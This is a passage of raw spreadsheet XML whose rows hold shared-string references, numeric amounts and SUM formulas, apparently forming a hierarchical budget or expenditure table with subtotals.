      <c r="E661" s="16" t="s">
        <v>3474</v>
      </c>
      <c r="F661" s="17">
        <v>490</v>
      </c>
    </row>
    <row r="662" spans="1:6">
      <c r="A662" s="10"/>
      <c r="B662" s="10"/>
      <c r="C662" s="28"/>
      <c r="D662" s="10" t="s">
        <v>5375</v>
      </c>
      <c r="E662" s="11" t="s">
        <v>3475</v>
      </c>
      <c r="F662" s="12">
        <f>SUM(F663:F669)</f>
        <v>538</v>
      </c>
    </row>
    <row r="663" spans="1:6">
      <c r="A663" s="10"/>
      <c r="B663" s="10"/>
      <c r="C663" s="28"/>
      <c r="D663" s="10" t="s">
        <v>5376</v>
      </c>
      <c r="E663" s="16" t="s">
        <v>2521</v>
      </c>
      <c r="F663" s="17">
        <v>325</v>
      </c>
    </row>
    <row r="664" spans="1:6">
      <c r="A664" s="10"/>
      <c r="B664" s="10"/>
      <c r="C664" s="28"/>
      <c r="D664" s="10" t="s">
        <v>5377</v>
      </c>
      <c r="E664" s="16" t="s">
        <v>2523</v>
      </c>
      <c r="F664" s="17">
        <v>0</v>
      </c>
    </row>
    <row r="665" spans="1:6">
      <c r="A665" s="10"/>
      <c r="B665" s="10"/>
      <c r="C665" s="28"/>
      <c r="D665" s="10" t="s">
        <v>5378</v>
      </c>
      <c r="E665" s="16" t="s">
        <v>2525</v>
      </c>
      <c r="F665" s="17">
        <v>0</v>
      </c>
    </row>
    <row r="666" spans="1:6">
      <c r="A666" s="10"/>
      <c r="B666" s="10"/>
      <c r="C666" s="28"/>
      <c r="D666" s="10" t="s">
        <v>5379</v>
      </c>
      <c r="E666" s="16" t="s">
        <v>3476</v>
      </c>
      <c r="F666" s="17">
        <v>75</v>
      </c>
    </row>
    <row r="667" spans="1:6">
      <c r="A667" s="10"/>
      <c r="B667" s="10"/>
      <c r="C667" s="28"/>
      <c r="D667" s="10" t="s">
        <v>5380</v>
      </c>
      <c r="E667" s="16" t="s">
        <v>3477</v>
      </c>
      <c r="F667" s="17">
        <v>0</v>
      </c>
    </row>
    <row r="668" spans="1:6">
      <c r="A668" s="10"/>
      <c r="B668" s="10"/>
      <c r="C668" s="28"/>
      <c r="D668" s="10" t="s">
        <v>5381</v>
      </c>
      <c r="E668" s="16" t="s">
        <v>2539</v>
      </c>
      <c r="F668" s="17">
        <v>0</v>
      </c>
    </row>
    <row r="669" spans="1:6">
      <c r="A669" s="10"/>
      <c r="B669" s="10"/>
      <c r="C669" s="28"/>
      <c r="D669" s="10" t="s">
        <v>5382</v>
      </c>
      <c r="E669" s="16" t="s">
        <v>3478</v>
      </c>
      <c r="F669" s="17">
        <v>138</v>
      </c>
    </row>
    <row r="670" spans="1:6">
      <c r="A670" s="10"/>
      <c r="B670" s="10"/>
      <c r="C670" s="28"/>
      <c r="D670" s="10" t="s">
        <v>5383</v>
      </c>
      <c r="E670" s="11" t="s">
        <v>3479</v>
      </c>
      <c r="F670" s="12">
        <f>SUM(F671:F672)</f>
        <v>115</v>
      </c>
    </row>
    <row r="671" spans="1:6">
      <c r="A671" s="10"/>
      <c r="B671" s="10"/>
      <c r="C671" s="28"/>
      <c r="D671" s="10" t="s">
        <v>5384</v>
      </c>
      <c r="E671" s="16" t="s">
        <v>3480</v>
      </c>
      <c r="F671" s="17">
        <v>115</v>
      </c>
    </row>
    <row r="672" spans="1:6">
      <c r="A672" s="10"/>
      <c r="B672" s="10"/>
      <c r="C672" s="28"/>
      <c r="D672" s="10" t="s">
        <v>5385</v>
      </c>
      <c r="E672" s="16" t="s">
        <v>3481</v>
      </c>
      <c r="F672" s="17">
        <v>0</v>
      </c>
    </row>
    <row r="673" spans="1:6">
      <c r="A673" s="10"/>
      <c r="B673" s="10"/>
      <c r="C673" s="28"/>
      <c r="D673" s="10" t="s">
        <v>5386</v>
      </c>
      <c r="E673" s="11" t="s">
        <v>3482</v>
      </c>
      <c r="F673" s="12">
        <f>F674</f>
        <v>115</v>
      </c>
    </row>
    <row r="674" spans="1:6">
      <c r="A674" s="10"/>
      <c r="B674" s="10"/>
      <c r="C674" s="28"/>
      <c r="D674" s="10" t="s">
        <v>5387</v>
      </c>
      <c r="E674" s="16" t="s">
        <v>3483</v>
      </c>
      <c r="F674" s="17">
        <v>115</v>
      </c>
    </row>
    <row r="675" spans="1:6">
      <c r="A675" s="10"/>
      <c r="B675" s="10"/>
      <c r="C675" s="28"/>
      <c r="D675" s="10" t="s">
        <v>5388</v>
      </c>
      <c r="E675" s="11" t="s">
        <v>3484</v>
      </c>
      <c r="F675" s="12">
        <f>F676+F681+F695+F699+F711+F714+F718+F723+F727+F731+F734+F743+F745</f>
        <v>39479</v>
      </c>
    </row>
    <row r="676" spans="1:6">
      <c r="A676" s="10"/>
      <c r="B676" s="10"/>
      <c r="C676" s="28"/>
      <c r="D676" s="10" t="s">
        <v>5389</v>
      </c>
      <c r="E676" s="11" t="s">
        <v>3485</v>
      </c>
      <c r="F676" s="12">
        <f>SUM(F677:F680)</f>
        <v>1726</v>
      </c>
    </row>
    <row r="677" spans="1:6">
      <c r="A677" s="10"/>
      <c r="B677" s="10"/>
      <c r="C677" s="28"/>
      <c r="D677" s="10" t="s">
        <v>5390</v>
      </c>
      <c r="E677" s="16" t="s">
        <v>2521</v>
      </c>
      <c r="F677" s="17">
        <v>1655</v>
      </c>
    </row>
    <row r="678" spans="1:6">
      <c r="A678" s="10"/>
      <c r="B678" s="10"/>
      <c r="C678" s="28"/>
      <c r="D678" s="10" t="s">
        <v>5391</v>
      </c>
      <c r="E678" s="16" t="s">
        <v>2523</v>
      </c>
      <c r="F678" s="17">
        <v>0</v>
      </c>
    </row>
    <row r="679" spans="1:6">
      <c r="A679" s="10"/>
      <c r="B679" s="10"/>
      <c r="C679" s="28"/>
      <c r="D679" s="10" t="s">
        <v>5392</v>
      </c>
      <c r="E679" s="16" t="s">
        <v>2525</v>
      </c>
      <c r="F679" s="17">
        <v>0</v>
      </c>
    </row>
    <row r="680" spans="1:6">
      <c r="A680" s="10"/>
      <c r="B680" s="10"/>
      <c r="C680" s="28"/>
      <c r="D680" s="10" t="s">
        <v>5393</v>
      </c>
      <c r="E680" s="16" t="s">
        <v>3486</v>
      </c>
      <c r="F680" s="17">
        <v>71</v>
      </c>
    </row>
    <row r="681" spans="1:6">
      <c r="A681" s="32"/>
      <c r="B681" s="32"/>
      <c r="C681" s="32"/>
      <c r="D681" s="10" t="s">
        <v>5394</v>
      </c>
      <c r="E681" s="11" t="s">
        <v>3487</v>
      </c>
      <c r="F681" s="12">
        <f>SUM(F682:F694)</f>
        <v>1745</v>
      </c>
    </row>
    <row r="682" spans="1:6">
      <c r="A682" s="10"/>
      <c r="B682" s="10"/>
      <c r="C682" s="28"/>
      <c r="D682" s="10" t="s">
        <v>5395</v>
      </c>
      <c r="E682" s="16" t="s">
        <v>3488</v>
      </c>
      <c r="F682" s="17">
        <v>902</v>
      </c>
    </row>
    <row r="683" spans="1:6">
      <c r="A683" s="10"/>
      <c r="B683" s="10"/>
      <c r="C683" s="28"/>
      <c r="D683" s="10" t="s">
        <v>5396</v>
      </c>
      <c r="E683" s="16" t="s">
        <v>3489</v>
      </c>
      <c r="F683" s="17">
        <v>1</v>
      </c>
    </row>
    <row r="684" spans="1:6">
      <c r="A684" s="10"/>
      <c r="B684" s="10"/>
      <c r="C684" s="28"/>
      <c r="D684" s="10" t="s">
        <v>5397</v>
      </c>
      <c r="E684" s="16" t="s">
        <v>3490</v>
      </c>
      <c r="F684" s="17">
        <v>0</v>
      </c>
    </row>
    <row r="685" spans="1:6">
      <c r="A685" s="10"/>
      <c r="B685" s="10"/>
      <c r="C685" s="28"/>
      <c r="D685" s="10" t="s">
        <v>5398</v>
      </c>
      <c r="E685" s="16" t="s">
        <v>3491</v>
      </c>
      <c r="F685" s="17">
        <v>0</v>
      </c>
    </row>
    <row r="686" spans="1:6">
      <c r="A686" s="10"/>
      <c r="B686" s="10"/>
      <c r="C686" s="28"/>
      <c r="D686" s="10" t="s">
        <v>5399</v>
      </c>
      <c r="E686" s="16" t="s">
        <v>3492</v>
      </c>
      <c r="F686" s="17">
        <v>0</v>
      </c>
    </row>
    <row r="687" spans="1:6">
      <c r="A687" s="10"/>
      <c r="B687" s="10"/>
      <c r="C687" s="28"/>
      <c r="D687" s="10" t="s">
        <v>5400</v>
      </c>
      <c r="E687" s="16" t="s">
        <v>3493</v>
      </c>
      <c r="F687" s="17">
        <v>0</v>
      </c>
    </row>
    <row r="688" spans="1:6">
      <c r="A688" s="10"/>
      <c r="B688" s="10"/>
      <c r="C688" s="31"/>
      <c r="D688" s="10" t="s">
        <v>5401</v>
      </c>
      <c r="E688" s="16" t="s">
        <v>3494</v>
      </c>
      <c r="F688" s="17">
        <v>0</v>
      </c>
    </row>
    <row r="689" spans="1:6">
      <c r="A689" s="10"/>
      <c r="B689" s="10"/>
      <c r="C689" s="31"/>
      <c r="D689" s="10" t="s">
        <v>5402</v>
      </c>
      <c r="E689" s="16" t="s">
        <v>3495</v>
      </c>
      <c r="F689" s="17">
        <v>0</v>
      </c>
    </row>
    <row r="690" spans="1:6">
      <c r="A690" s="10"/>
      <c r="B690" s="10"/>
      <c r="C690" s="31"/>
      <c r="D690" s="10" t="s">
        <v>5403</v>
      </c>
      <c r="E690" s="16" t="s">
        <v>3496</v>
      </c>
      <c r="F690" s="17">
        <v>0</v>
      </c>
    </row>
    <row r="691" spans="1:6">
      <c r="A691" s="10"/>
      <c r="B691" s="10"/>
      <c r="C691" s="28"/>
      <c r="D691" s="10" t="s">
        <v>5404</v>
      </c>
      <c r="E691" s="16" t="s">
        <v>3497</v>
      </c>
      <c r="F691" s="17">
        <v>0</v>
      </c>
    </row>
    <row r="692" spans="1:6">
      <c r="A692" s="10"/>
      <c r="B692" s="10"/>
      <c r="C692" s="28"/>
      <c r="D692" s="10" t="s">
        <v>5405</v>
      </c>
      <c r="E692" s="16" t="s">
        <v>3498</v>
      </c>
      <c r="F692" s="17">
        <v>0</v>
      </c>
    </row>
    <row r="693" spans="1:6">
      <c r="A693" s="10"/>
      <c r="B693" s="10"/>
      <c r="C693" s="28"/>
      <c r="D693" s="10" t="s">
        <v>5406</v>
      </c>
      <c r="E693" s="16" t="s">
        <v>3499</v>
      </c>
      <c r="F693" s="17">
        <v>0</v>
      </c>
    </row>
    <row r="694" spans="1:6">
      <c r="A694" s="10"/>
      <c r="B694" s="10"/>
      <c r="C694" s="28"/>
      <c r="D694" s="10" t="s">
        <v>5407</v>
      </c>
      <c r="E694" s="16" t="s">
        <v>3500</v>
      </c>
      <c r="F694" s="17">
        <v>842</v>
      </c>
    </row>
    <row r="695" spans="1:6">
      <c r="A695" s="10"/>
      <c r="B695" s="10"/>
      <c r="C695" s="28"/>
      <c r="D695" s="10" t="s">
        <v>5408</v>
      </c>
      <c r="E695" s="11" t="s">
        <v>3501</v>
      </c>
      <c r="F695" s="12">
        <f>SUM(F696:F698)</f>
        <v>5721</v>
      </c>
    </row>
    <row r="696" spans="1:6">
      <c r="A696" s="10"/>
      <c r="B696" s="10"/>
      <c r="C696" s="28"/>
      <c r="D696" s="10" t="s">
        <v>5409</v>
      </c>
      <c r="E696" s="16" t="s">
        <v>3502</v>
      </c>
      <c r="F696" s="17">
        <v>0</v>
      </c>
    </row>
    <row r="697" spans="1:6">
      <c r="A697" s="10"/>
      <c r="B697" s="10"/>
      <c r="C697" s="28"/>
      <c r="D697" s="10" t="s">
        <v>5410</v>
      </c>
      <c r="E697" s="16" t="s">
        <v>3503</v>
      </c>
      <c r="F697" s="17">
        <v>4267</v>
      </c>
    </row>
    <row r="698" spans="1:6">
      <c r="A698" s="10"/>
      <c r="B698" s="10"/>
      <c r="C698" s="28"/>
      <c r="D698" s="10" t="s">
        <v>5411</v>
      </c>
      <c r="E698" s="16" t="s">
        <v>3504</v>
      </c>
      <c r="F698" s="17">
        <v>1454</v>
      </c>
    </row>
    <row r="699" spans="1:6">
      <c r="A699" s="10"/>
      <c r="B699" s="10"/>
      <c r="C699" s="28"/>
      <c r="D699" s="10" t="s">
        <v>5412</v>
      </c>
      <c r="E699" s="11" t="s">
        <v>3505</v>
      </c>
      <c r="F699" s="12">
        <f>SUM(F700:F710)</f>
        <v>8199</v>
      </c>
    </row>
    <row r="700" spans="1:6">
      <c r="A700" s="10"/>
      <c r="B700" s="10"/>
      <c r="C700" s="28"/>
      <c r="D700" s="10" t="s">
        <v>5413</v>
      </c>
      <c r="E700" s="16" t="s">
        <v>3506</v>
      </c>
      <c r="F700" s="17">
        <v>1516</v>
      </c>
    </row>
    <row r="701" spans="1:6">
      <c r="A701" s="10"/>
      <c r="B701" s="10"/>
      <c r="C701" s="28"/>
      <c r="D701" s="10" t="s">
        <v>5414</v>
      </c>
      <c r="E701" s="16" t="s">
        <v>3507</v>
      </c>
      <c r="F701" s="17">
        <v>0</v>
      </c>
    </row>
    <row r="702" spans="1:6">
      <c r="A702" s="10"/>
      <c r="B702" s="10"/>
      <c r="C702" s="28"/>
      <c r="D702" s="10" t="s">
        <v>5415</v>
      </c>
      <c r="E702" s="16" t="s">
        <v>3508</v>
      </c>
      <c r="F702" s="17">
        <v>820</v>
      </c>
    </row>
    <row r="703" spans="1:6">
      <c r="A703" s="10"/>
      <c r="B703" s="10"/>
      <c r="C703" s="28"/>
      <c r="D703" s="10" t="s">
        <v>5416</v>
      </c>
      <c r="E703" s="16" t="s">
        <v>3509</v>
      </c>
      <c r="F703" s="17">
        <v>0</v>
      </c>
    </row>
    <row r="704" spans="1:6">
      <c r="A704" s="10"/>
      <c r="B704" s="10"/>
      <c r="C704" s="28"/>
      <c r="D704" s="10" t="s">
        <v>5417</v>
      </c>
      <c r="E704" s="16" t="s">
        <v>3510</v>
      </c>
      <c r="F704" s="17">
        <v>0</v>
      </c>
    </row>
    <row r="705" spans="1:6">
      <c r="A705" s="10"/>
      <c r="B705" s="10"/>
      <c r="C705" s="28"/>
      <c r="D705" s="10" t="s">
        <v>5418</v>
      </c>
      <c r="E705" s="16" t="s">
        <v>3511</v>
      </c>
      <c r="F705" s="17">
        <v>0</v>
      </c>
    </row>
    <row r="706" spans="1:6">
      <c r="A706" s="10"/>
      <c r="B706" s="10"/>
      <c r="C706" s="28"/>
      <c r="D706" s="10" t="s">
        <v>5419</v>
      </c>
      <c r="E706" s="16" t="s">
        <v>3512</v>
      </c>
      <c r="F706" s="17">
        <v>60</v>
      </c>
    </row>
    <row r="707" spans="1:6">
      <c r="A707" s="10"/>
      <c r="B707" s="10"/>
      <c r="C707" s="28"/>
      <c r="D707" s="10" t="s">
        <v>5420</v>
      </c>
      <c r="E707" s="16" t="s">
        <v>3513</v>
      </c>
      <c r="F707" s="17">
        <v>4451</v>
      </c>
    </row>
    <row r="708" spans="1:6">
      <c r="A708" s="10"/>
      <c r="B708" s="10"/>
      <c r="C708" s="28"/>
      <c r="D708" s="10" t="s">
        <v>5421</v>
      </c>
      <c r="E708" s="16" t="s">
        <v>3514</v>
      </c>
      <c r="F708" s="17">
        <v>198</v>
      </c>
    </row>
    <row r="709" spans="1:6">
      <c r="A709" s="10"/>
      <c r="B709" s="10"/>
      <c r="C709" s="28"/>
      <c r="D709" s="10" t="s">
        <v>5422</v>
      </c>
      <c r="E709" s="16" t="s">
        <v>3515</v>
      </c>
      <c r="F709" s="17">
        <v>1114</v>
      </c>
    </row>
    <row r="710" spans="1:6">
      <c r="A710" s="10"/>
      <c r="B710" s="10"/>
      <c r="C710" s="28"/>
      <c r="D710" s="10" t="s">
        <v>5423</v>
      </c>
      <c r="E710" s="16" t="s">
        <v>3516</v>
      </c>
      <c r="F710" s="17">
        <v>40</v>
      </c>
    </row>
    <row r="711" spans="1:6">
      <c r="A711" s="10"/>
      <c r="B711" s="10"/>
      <c r="C711" s="28"/>
      <c r="D711" s="10" t="s">
        <v>5424</v>
      </c>
      <c r="E711" s="11" t="s">
        <v>3517</v>
      </c>
      <c r="F711" s="12">
        <f>SUM(F712:F713)</f>
        <v>111</v>
      </c>
    </row>
    <row r="712" spans="1:6">
      <c r="A712" s="10"/>
      <c r="B712" s="10"/>
      <c r="C712" s="28"/>
      <c r="D712" s="10" t="s">
        <v>5425</v>
      </c>
      <c r="E712" s="16" t="s">
        <v>3518</v>
      </c>
      <c r="F712" s="17">
        <v>111</v>
      </c>
    </row>
    <row r="713" spans="1:6">
      <c r="A713" s="10"/>
      <c r="B713" s="10"/>
      <c r="C713" s="28"/>
      <c r="D713" s="10" t="s">
        <v>5426</v>
      </c>
      <c r="E713" s="16" t="s">
        <v>3519</v>
      </c>
      <c r="F713" s="17">
        <v>0</v>
      </c>
    </row>
    <row r="714" spans="1:6">
      <c r="A714" s="10"/>
      <c r="B714" s="10"/>
      <c r="C714" s="28"/>
      <c r="D714" s="10" t="s">
        <v>5427</v>
      </c>
      <c r="E714" s="11" t="s">
        <v>3520</v>
      </c>
      <c r="F714" s="12">
        <f>SUM(F715:F717)</f>
        <v>5516</v>
      </c>
    </row>
    <row r="715" spans="1:6">
      <c r="A715" s="10"/>
      <c r="B715" s="10"/>
      <c r="C715" s="28"/>
      <c r="D715" s="10" t="s">
        <v>5428</v>
      </c>
      <c r="E715" s="16" t="s">
        <v>3521</v>
      </c>
      <c r="F715" s="17">
        <v>0</v>
      </c>
    </row>
    <row r="716" spans="1:6">
      <c r="A716" s="10"/>
      <c r="B716" s="10"/>
      <c r="C716" s="28"/>
      <c r="D716" s="10" t="s">
        <v>5429</v>
      </c>
      <c r="E716" s="16" t="s">
        <v>3522</v>
      </c>
      <c r="F716" s="17">
        <v>4904</v>
      </c>
    </row>
    <row r="717" spans="1:6">
      <c r="A717" s="10"/>
      <c r="B717" s="10"/>
      <c r="C717" s="28"/>
      <c r="D717" s="10" t="s">
        <v>5430</v>
      </c>
      <c r="E717" s="16" t="s">
        <v>3523</v>
      </c>
      <c r="F717" s="17">
        <v>612</v>
      </c>
    </row>
    <row r="718" spans="1:6">
      <c r="A718" s="10"/>
      <c r="B718" s="10"/>
      <c r="C718" s="28"/>
      <c r="D718" s="10" t="s">
        <v>5431</v>
      </c>
      <c r="E718" s="11" t="s">
        <v>3524</v>
      </c>
      <c r="F718" s="12">
        <f>SUM(F719:F722)</f>
        <v>9899</v>
      </c>
    </row>
    <row r="719" spans="1:6">
      <c r="A719" s="10"/>
      <c r="B719" s="10"/>
      <c r="C719" s="28"/>
      <c r="D719" s="10" t="s">
        <v>5432</v>
      </c>
      <c r="E719" s="16" t="s">
        <v>3525</v>
      </c>
      <c r="F719" s="17">
        <v>2801</v>
      </c>
    </row>
    <row r="720" spans="1:6">
      <c r="A720" s="10"/>
      <c r="B720" s="10"/>
      <c r="C720" s="28"/>
      <c r="D720" s="10" t="s">
        <v>5433</v>
      </c>
      <c r="E720" s="16" t="s">
        <v>3526</v>
      </c>
      <c r="F720" s="17">
        <v>3987</v>
      </c>
    </row>
    <row r="721" spans="1:6">
      <c r="A721" s="10"/>
      <c r="B721" s="10"/>
      <c r="C721" s="28"/>
      <c r="D721" s="10" t="s">
        <v>5434</v>
      </c>
      <c r="E721" s="16" t="s">
        <v>3527</v>
      </c>
      <c r="F721" s="17">
        <v>3110</v>
      </c>
    </row>
    <row r="722" spans="1:6">
      <c r="A722" s="10"/>
      <c r="B722" s="10"/>
      <c r="C722" s="28"/>
      <c r="D722" s="10" t="s">
        <v>5435</v>
      </c>
      <c r="E722" s="16" t="s">
        <v>3528</v>
      </c>
      <c r="F722" s="17">
        <v>1</v>
      </c>
    </row>
    <row r="723" spans="1:6">
      <c r="A723" s="10"/>
      <c r="B723" s="10"/>
      <c r="C723" s="28"/>
      <c r="D723" s="10" t="s">
        <v>5436</v>
      </c>
      <c r="E723" s="11" t="s">
        <v>3529</v>
      </c>
      <c r="F723" s="12">
        <f>SUM(F724:F726)</f>
        <v>2442</v>
      </c>
    </row>
    <row r="724" spans="1:6">
      <c r="A724" s="10"/>
      <c r="B724" s="10"/>
      <c r="C724" s="28"/>
      <c r="D724" s="10" t="s">
        <v>5437</v>
      </c>
      <c r="E724" s="16" t="s">
        <v>3530</v>
      </c>
      <c r="F724" s="17">
        <v>0</v>
      </c>
    </row>
    <row r="725" spans="1:6">
      <c r="A725" s="10"/>
      <c r="B725" s="10"/>
      <c r="C725" s="28"/>
      <c r="D725" s="10" t="s">
        <v>5438</v>
      </c>
      <c r="E725" s="16" t="s">
        <v>3531</v>
      </c>
      <c r="F725" s="17">
        <v>2442</v>
      </c>
    </row>
    <row r="726" spans="1:6">
      <c r="A726" s="10"/>
      <c r="B726" s="10"/>
      <c r="C726" s="28"/>
      <c r="D726" s="10" t="s">
        <v>5439</v>
      </c>
      <c r="E726" s="16" t="s">
        <v>3532</v>
      </c>
      <c r="F726" s="17">
        <v>0</v>
      </c>
    </row>
    <row r="727" spans="1:6">
      <c r="A727" s="10"/>
      <c r="B727" s="10"/>
      <c r="C727" s="28"/>
      <c r="D727" s="10" t="s">
        <v>5440</v>
      </c>
      <c r="E727" s="11" t="s">
        <v>3533</v>
      </c>
      <c r="F727" s="12">
        <f>SUM(F728:F730)</f>
        <v>2734</v>
      </c>
    </row>
    <row r="728" spans="1:6">
      <c r="A728" s="10"/>
      <c r="B728" s="10"/>
      <c r="C728" s="28"/>
      <c r="D728" s="10" t="s">
        <v>5441</v>
      </c>
      <c r="E728" s="16" t="s">
        <v>3534</v>
      </c>
      <c r="F728" s="17">
        <v>2490</v>
      </c>
    </row>
    <row r="729" spans="1:6">
      <c r="A729" s="10"/>
      <c r="B729" s="10"/>
      <c r="C729" s="28"/>
      <c r="D729" s="10" t="s">
        <v>5442</v>
      </c>
      <c r="E729" s="16" t="s">
        <v>3535</v>
      </c>
      <c r="F729" s="17">
        <v>0</v>
      </c>
    </row>
    <row r="730" spans="1:6">
      <c r="A730" s="10"/>
      <c r="B730" s="10"/>
      <c r="C730" s="28"/>
      <c r="D730" s="10" t="s">
        <v>5443</v>
      </c>
      <c r="E730" s="16" t="s">
        <v>3536</v>
      </c>
      <c r="F730" s="17">
        <v>244</v>
      </c>
    </row>
    <row r="731" spans="1:6">
      <c r="A731" s="10"/>
      <c r="B731" s="10"/>
      <c r="C731" s="28"/>
      <c r="D731" s="10" t="s">
        <v>5444</v>
      </c>
      <c r="E731" s="11" t="s">
        <v>3537</v>
      </c>
      <c r="F731" s="12">
        <f>SUM(F732:F733)</f>
        <v>676</v>
      </c>
    </row>
    <row r="732" spans="1:6">
      <c r="A732" s="10"/>
      <c r="B732" s="10"/>
      <c r="C732" s="28"/>
      <c r="D732" s="10" t="s">
        <v>5445</v>
      </c>
      <c r="E732" s="16" t="s">
        <v>3538</v>
      </c>
      <c r="F732" s="17">
        <v>646</v>
      </c>
    </row>
    <row r="733" spans="1:6">
      <c r="A733" s="10"/>
      <c r="B733" s="10"/>
      <c r="C733" s="28"/>
      <c r="D733" s="10" t="s">
        <v>5446</v>
      </c>
      <c r="E733" s="16" t="s">
        <v>3539</v>
      </c>
      <c r="F733" s="17">
        <v>30</v>
      </c>
    </row>
    <row r="734" spans="1:6">
      <c r="A734" s="10"/>
      <c r="B734" s="10"/>
      <c r="C734" s="31"/>
      <c r="D734" s="10" t="s">
        <v>5447</v>
      </c>
      <c r="E734" s="11" t="s">
        <v>3540</v>
      </c>
      <c r="F734" s="12">
        <f>SUM(F735:F742)</f>
        <v>21</v>
      </c>
    </row>
    <row r="735" spans="1:6">
      <c r="A735" s="10"/>
      <c r="B735" s="10"/>
      <c r="C735" s="28"/>
      <c r="D735" s="10" t="s">
        <v>5448</v>
      </c>
      <c r="E735" s="16" t="s">
        <v>2521</v>
      </c>
      <c r="F735" s="17">
        <v>13</v>
      </c>
    </row>
    <row r="736" spans="1:6">
      <c r="A736" s="10"/>
      <c r="B736" s="10"/>
      <c r="C736" s="28"/>
      <c r="D736" s="10" t="s">
        <v>5449</v>
      </c>
      <c r="E736" s="16" t="s">
        <v>2523</v>
      </c>
      <c r="F736" s="17">
        <v>0</v>
      </c>
    </row>
    <row r="737" spans="1:6">
      <c r="A737" s="10"/>
      <c r="B737" s="10"/>
      <c r="C737" s="28"/>
      <c r="D737" s="10" t="s">
        <v>5450</v>
      </c>
      <c r="E737" s="16" t="s">
        <v>2525</v>
      </c>
      <c r="F737" s="17">
        <v>0</v>
      </c>
    </row>
    <row r="738" spans="1:6">
      <c r="A738" s="10"/>
      <c r="B738" s="10"/>
      <c r="C738" s="28"/>
      <c r="D738" s="10" t="s">
        <v>5451</v>
      </c>
      <c r="E738" s="16" t="s">
        <v>2622</v>
      </c>
      <c r="F738" s="17">
        <v>0</v>
      </c>
    </row>
    <row r="739" spans="1:6">
      <c r="A739" s="10"/>
      <c r="B739" s="10"/>
      <c r="C739" s="28"/>
      <c r="D739" s="10" t="s">
        <v>5452</v>
      </c>
      <c r="E739" s="16" t="s">
        <v>3541</v>
      </c>
      <c r="F739" s="17">
        <v>0</v>
      </c>
    </row>
    <row r="740" spans="1:6">
      <c r="A740" s="10"/>
      <c r="B740" s="10"/>
      <c r="C740" s="28"/>
      <c r="D740" s="10" t="s">
        <v>5453</v>
      </c>
      <c r="E740" s="16" t="s">
        <v>3542</v>
      </c>
      <c r="F740" s="17">
        <v>0</v>
      </c>
    </row>
    <row r="741" spans="1:6">
      <c r="A741" s="10"/>
      <c r="B741" s="10"/>
      <c r="C741" s="28"/>
      <c r="D741" s="10" t="s">
        <v>5454</v>
      </c>
      <c r="E741" s="16" t="s">
        <v>2539</v>
      </c>
      <c r="F741" s="17">
        <v>0</v>
      </c>
    </row>
    <row r="742" spans="1:6">
      <c r="A742" s="10"/>
      <c r="B742" s="10"/>
      <c r="C742" s="28"/>
      <c r="D742" s="10" t="s">
        <v>5455</v>
      </c>
      <c r="E742" s="16" t="s">
        <v>3543</v>
      </c>
      <c r="F742" s="17">
        <v>8</v>
      </c>
    </row>
    <row r="743" spans="1:6">
      <c r="A743" s="10"/>
      <c r="B743" s="10"/>
      <c r="C743" s="28"/>
      <c r="D743" s="10" t="s">
        <v>5456</v>
      </c>
      <c r="E743" s="11" t="s">
        <v>3544</v>
      </c>
      <c r="F743" s="12">
        <f>F744</f>
        <v>540</v>
      </c>
    </row>
    <row r="744" spans="1:6">
      <c r="A744" s="10"/>
      <c r="B744" s="10"/>
      <c r="C744" s="28"/>
      <c r="D744" s="10" t="s">
        <v>5457</v>
      </c>
      <c r="E744" s="16" t="s">
        <v>3545</v>
      </c>
      <c r="F744" s="17">
        <v>540</v>
      </c>
    </row>
    <row r="745" spans="1:6">
      <c r="A745" s="10"/>
      <c r="B745" s="10"/>
      <c r="C745" s="28"/>
      <c r="D745" s="10" t="s">
        <v>5458</v>
      </c>
      <c r="E745" s="11" t="s">
        <v>3546</v>
      </c>
      <c r="F745" s="12">
        <f>F746</f>
        <v>149</v>
      </c>
    </row>
    <row r="746" spans="1:6">
      <c r="A746" s="10"/>
      <c r="B746" s="10"/>
      <c r="C746" s="28"/>
      <c r="D746" s="10" t="s">
        <v>5459</v>
      </c>
      <c r="E746" s="16" t="s">
        <v>3547</v>
      </c>
      <c r="F746" s="17">
        <v>149</v>
      </c>
    </row>
    <row r="747" spans="1:6">
      <c r="A747" s="10"/>
      <c r="B747" s="10"/>
      <c r="C747" s="28"/>
      <c r="D747" s="10" t="s">
        <v>5460</v>
      </c>
      <c r="E747" s="11" t="s">
        <v>3548</v>
      </c>
      <c r="F747" s="12">
        <f>F748+F758+F762+F771+F776+F783+F789+F792+F795+F797+F799+F805+F807+F809+F824</f>
        <v>6903</v>
      </c>
    </row>
    <row r="748" spans="1:6">
      <c r="A748" s="10"/>
      <c r="B748" s="10"/>
      <c r="C748" s="28"/>
      <c r="D748" s="10" t="s">
        <v>5461</v>
      </c>
      <c r="E748" s="11" t="s">
        <v>3549</v>
      </c>
      <c r="F748" s="12">
        <f>SUM(F749:F757)</f>
        <v>531</v>
      </c>
    </row>
    <row r="749" spans="1:6">
      <c r="A749" s="10"/>
      <c r="B749" s="10"/>
      <c r="C749" s="28"/>
      <c r="D749" s="10" t="s">
        <v>5462</v>
      </c>
      <c r="E749" s="16" t="s">
        <v>2521</v>
      </c>
      <c r="F749" s="17">
        <v>127</v>
      </c>
    </row>
    <row r="750" spans="1:6">
      <c r="A750" s="10"/>
      <c r="B750" s="10"/>
      <c r="C750" s="28"/>
      <c r="D750" s="10" t="s">
        <v>5463</v>
      </c>
      <c r="E750" s="16" t="s">
        <v>2523</v>
      </c>
      <c r="F750" s="17">
        <v>0</v>
      </c>
    </row>
    <row r="751" spans="1:6">
      <c r="A751" s="10"/>
      <c r="B751" s="10"/>
      <c r="C751" s="28"/>
      <c r="D751" s="10" t="s">
        <v>5464</v>
      </c>
      <c r="E751" s="16" t="s">
        <v>2525</v>
      </c>
      <c r="F751" s="17">
        <v>0</v>
      </c>
    </row>
    <row r="752" spans="1:6">
      <c r="A752" s="10"/>
      <c r="B752" s="10"/>
      <c r="C752" s="28"/>
      <c r="D752" s="10" t="s">
        <v>5465</v>
      </c>
      <c r="E752" s="16" t="s">
        <v>3550</v>
      </c>
      <c r="F752" s="17">
        <v>0</v>
      </c>
    </row>
    <row r="753" spans="1:6">
      <c r="A753" s="10"/>
      <c r="B753" s="10"/>
      <c r="C753" s="28"/>
      <c r="D753" s="10" t="s">
        <v>5466</v>
      </c>
      <c r="E753" s="16" t="s">
        <v>3551</v>
      </c>
      <c r="F753" s="17">
        <v>0</v>
      </c>
    </row>
    <row r="754" spans="1:6">
      <c r="A754" s="10"/>
      <c r="B754" s="10"/>
      <c r="C754" s="28"/>
      <c r="D754" s="10" t="s">
        <v>5467</v>
      </c>
      <c r="E754" s="16" t="s">
        <v>3552</v>
      </c>
      <c r="F754" s="17">
        <v>0</v>
      </c>
    </row>
    <row r="755" spans="1:6">
